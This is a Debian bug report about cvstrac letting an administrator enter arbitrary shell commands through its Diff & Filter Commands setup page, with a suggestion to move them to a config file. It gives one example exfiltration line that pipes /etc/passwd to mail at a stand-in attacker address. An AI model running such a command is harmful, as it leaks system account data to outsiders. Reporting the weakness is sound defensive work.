Package: cvstrac
Severity: normal

The cvstrac has a potential security issue, whereby if a hacker gains
knowlege of the administrative password, he can gain access to shell 
commands and compromise the whole system.

Here is the issue:

The hacker obtains the administrative password via brute force, or other 
means.

He now logs onto cvstrac as an administrator. To access the shell 
commands, the user can now navigate the menus as follows:

Setup
Diff & Filter Commands

The user can now enter malicious shell commands in the text box, for 
example:

cat /etc/passwd|mail hac...@badguys.net

It would be better if any shell commands used by cvstrac were stored in 
a configuration file /etc/cvstrac/cvsconfig.conf rather than enabling 
them to be edited via the cvstrac interface, or a facility was provided 
to disable this configuration option.

Mark.

-- System Information:
Debian Release: 5.0.2
  APT prefers stable
  APT policy: (990, 'stable'), (50, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26-2-486
Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages cvstrac depends on:
ii  libc6                         2.7-18     GNU C Library: Shared libraries
ii  libsqlite3-0                  3.5.9-6    SQLite 3 shared library
pn  rcs                           <none>     (no description available)

cvstrac recommends no packages.

cvstrac suggests no packages.




-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org

Reply via email to